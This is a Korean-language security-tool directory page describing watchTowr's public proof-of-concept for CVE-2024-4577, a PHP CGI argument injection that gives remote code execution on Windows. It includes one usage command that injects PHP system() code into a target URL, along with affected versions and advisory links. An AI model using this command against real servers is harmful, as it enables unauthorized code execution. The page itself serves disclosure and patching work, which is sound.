Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-4577 — PHP CGI 인자 주입 (CVE-2024-4577) 원격 코드 실행 PoC | Kitploit
도구/GitHubGitHub/watchtowrlabs/cve-2024-4577
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubwatchtowrlabs/cve-2024-4577

CVE-2024-4577

PHP CGI 인자 주입 (CVE-2024-4577) 원격 코드 실행 PoC

저장소 보기
317652년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-4577

@watchTowr가 개발한 PoC(Proof of Concept)로, PHP CGI 인자 주입(Argument Injection) 취약점(CVE-2024-4577)을 악용하여 Windows 환경에서 실행되는 취약한 PHP 버전에서 RCE(원격 코드 실행)를 획득합니다. 이 취약점에 대한 상세 기술 분석

Orange Tsi 🍊

이 취약점은 DEVCORE (@d3vc0r3)의 Orange Tsai (@orange_8361)가 발견했습니다. 그의 뛰어난 연구를 꼭 팔로우하세요. 우리의 역할은 이 문제에 대한 익스플로잇을 재현하고 개발하는 것뿐이었습니다.

PoC || GTFO

root@kitploit:~
python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-php_cve-2024-4577.py
        (*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
          - Aliz Hammond, watchTowr ([email protected])
          - Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
        CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)

(+) Exploit was successful

영향받는 버전

원본 DEVCORE (@d3vc0r3)의 블로그 게시물에 따르면, 이 취약점은 Windows 운영 체제에 설치된 모든 PHP 버전에 영향을 미칩니다:

root@kitploit:~
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29

PHP 8.0, PHP 7 및 PHP 5 브랜치는 수명 종료(End-of-Life)되어 더 이상 유지 관리되지 않으므로, 서버 관리자는 여기의 'Am I Vulnerable' 섹션을 참조하여 완화 조치(Mitigation Measure) 섹션에서 임시 패치 권장 사항을 확인할 수 있습니다.

익스플로잇 작성자

watchTowr (@watchtowrcyber)의 Aliz (@AlizTheHax0r) 및 Sina Kheirkhah (@SinSinology)

watchTowr Labs 팔로우하기

최신 보안 연구를 보려면 watchTowr Labs 팀을 팔로우하세요.

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
  • https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html
  • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/
도구 다운로드